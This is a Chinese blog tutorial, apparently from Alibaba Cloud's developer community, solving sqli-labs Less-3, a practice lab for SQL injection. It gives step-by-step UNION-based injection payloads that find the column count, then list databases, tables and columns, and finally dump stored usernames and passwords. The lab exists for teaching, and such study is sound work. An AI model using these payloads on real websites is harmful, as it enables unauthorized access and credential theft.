备案控制台

开发者社区安全文章正文

sqli-lab教程Less-3

2024-01-25 127

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： sqli-lab教程Less-3

less-3

sqli-lab通过各种方式（整型注入，字符注入，布尔盲注，时间盲注，堆叠注入…）爆出库表字段拿到字段值。

学习sqli注入必备语句：

查库：select schema_name from information_schema.schemata

查表：select table_name from information_schema.tables where table_schema=‘security’（此处拿security库为例）

查字段：select column_name from information_schema.columns where table_name=‘users’（此处拿users表例）

查字段的值：select username,password from security.users（此处拿username，password字段为例）

1.加单引号看出，此处是用单引号+单括号包裹的，使用单引号+单括号注入

2.使用- -+闭合，回显恢复

3.使用order by语句判断列数

4.发现有三列

5.使用union select联合查询，把id改成一个不存在的值使得有回显位

?id=-1') union select 1,2,3 --+

6.进行爆库操作

?id=-1') union select 1,2,database() --+

7.进行爆表操作

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

group_concat：将所有的数据连接进行拼接后作为一行显示

where：指定库的位置

8.进行爆字段操作

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

9.进行爆字段值操作

?id=-1') union select 1,2,group_concat(concat_ws('~',username,password)) from security.users --+

concat_ws(’~’,A,B)

显示为(A~B)，用于区分用户名、密码

注入完成！这是方法之一，后期会出sqlmap工具等教程…

文章标签：

安全

数据安全/隐私保护

Brucye

目录

相关文章

源码星辰

|

传感器人工智能监控

Springcloud+Vue智慧工地管理云平台源码 AI智能识别

“智慧工地管理平台”以现场实际施工及管理经验为依托，针对工地现场痛点，能在工地落地实施的模块化、一体化综合管理平台。为建筑公司、地产公司、监管单位租赁企业、设备生产厂提供了完整的数据接入和管理服务。

源码星辰

299 2 5

拂去尘世尘

|

存储缓存 Linux

【实战指南】用最小堆实现通用的高效定时器组件

本文介绍了如何使用最小堆实现高效的定时器组件，以解决Linux应用开发中定时器资源有限的问题。文章详细描述了最小堆方式的实现原理，包括系统定时器、定时器任务和定时器任务管理三个类的设计与源码实现。测试结果显示，该方法能够准确触发定时任务，有效利用系统资源。总结部分强调了使用最小堆的优势，以及通过抽象类实现清晰的业务逻辑。

拂去尘世尘

442 100 147

游客moiomvrp3vyac2

|

存储安全大数据

深入浅出操作系统：文件系统的秘密

【10月更文挑战第35天】本文将揭示文件系统背后的奥秘，从其基本概念到复杂的实现机制。我们将一起探索文件系统的结构和原理，并了解它如何影响我们的日常计算体验。通过简单的例子和比喻，文章旨在使读者对文件系统有一个清晰而深刻的理解，就像甘地所言：“你必须成为你希望在世界上看到的改变。”让我们一起成为理解操作系统的先行者。

游客moiomvrp3vyac2

212 3 3

winx_19970108018

|

10月前

|

JSON API 数据格式

爱回收获取询价项API接口（爱回收API系列）

爱回收是国内领先的电子产品回收平台，提供便捷的二手设备回收服务。开发者可通过其API接口集成询价功能，提升应用竞争力。该API采用POST请求，需传递app_id、timestamp、sign等参数，返回JSON格式的回收价格信息。示例代码展示了如何使用Python调用此API，获取并打印询价项和回收价格。请确保替换实际的app_id和app_secret，并关注官方文档以保持接口信息准确。

winx_19970108018

508 0 0

游客g6r3tt6lma5xg

|

11月前

|

弹性计算运维安全

为了提升运维工程师及开发者

为了提升运维工程师及开发者

游客g6r3tt6lma5xg

268 66 66

途途途途

|

Ubuntu 网络协议 Linux

【附安装包】CentOS7(Linux)详细安装教程(手把手图文详解版)

【附安装包】CentOS7(Linux)详细安装教程(手把手图文详解版)

途途途途

5979 2 3

wljslmz

|

负载均衡监控安全

Wi-Fi漫游深入解析：确保设备连接的有效策略

Wi-Fi漫游深入解析：确保设备连接的有效策略

wljslmz

1536 9 9

赵渝强老师

|

关系型数据库 MySQL 数据库

【赵渝强老师】MySQL的binlog日志文件

MySQL的binlog日志记录了所有对数据库的更改操作（不包括SELECT和SHOW），主要用于主从复制和数据恢复。binlog有三种模式，可通过设置binlog_format参数选择。示例展示了如何启用binlog、设置格式、查看日志文件及记录的信息。

赵渝强老师

861 6 6

互联网课堂

|

JavaScript Java 关系型数据库

Spring事务失效的8种场景

本文总结了使用 @Transactional 注解时事务可能失效的几种情况，包括数据库引擎不支持事务、类未被 Spring 管理、方法非 public、自身调用、未配置事务管理器、设置为不支持事务、异常未抛出及异常类型不匹配等。针对这些情况，文章提供了相应的解决建议，帮助开发者排查和解决事务不生效的问题。

互联网课堂

2078 1 1

1288912195458132

|

安全数据安全/隐私保护

kali 安装awvs

kali 安装awvs

1288912195458132

1029 0 0

热门文章

最新文章

2025年阿里云域名备案流程（图文详细教程）

PostgreSQL 最佳实践 - 逻辑增量复制(MySQL <-> PgSQL <-> PgSQL)

什么是视频推流和视频拉流？视频推流和视频拉流都涉及哪些技术？一文带您了解！

程序员如何让自己 Be Cloud Native - 配置篇

Javascript 文件命名规范

linux默认语言修改成中文，中文修改成英文

VMware 主IP地址：网络信息不可用

一文读懂 SOA 架构和微服务架构的区别

OkHttp 3.7源码分析（五）——连接池

阿里云服务器被挖矿怎么解决

阿里云服务器ECS自定义购买流程：超详细新手入门教程

阿里云服务器100M固定带宽收费标准：一年、1个月和1小时费用价格

《多账号同源识别核心技术拆解：从行为指纹到身份锚定的实操逻辑》

运维数据分析：别再只会翻日志了，真正的价值在“洞察”

《高价值付费玩家行为共性深析：从体验锚定到价值共生的实操拆解》

别再拍脑袋扩容了：用 ML 做容量预测，才是云成本和性能的最优解

别再全量拉表了兄弟：一篇讲透增量数据处理与 CDC 的实战指南

Java Stream API：让集合操作变得优雅

Java Stream API：告别繁琐循环，拥抱优雅集合操作

掌握Java Stream API：让集合操作更优雅

相关电子书

更多

低代码开发师（初级）实战教程

冬季实战营第三期：MySQL数据库进阶实战

阿里巴巴DevOps 最佳实践手册

下一篇

「直播预告」Streaming Lakehouse Meetup EP.2｜Paimon × StarRocks 共话实时湖仓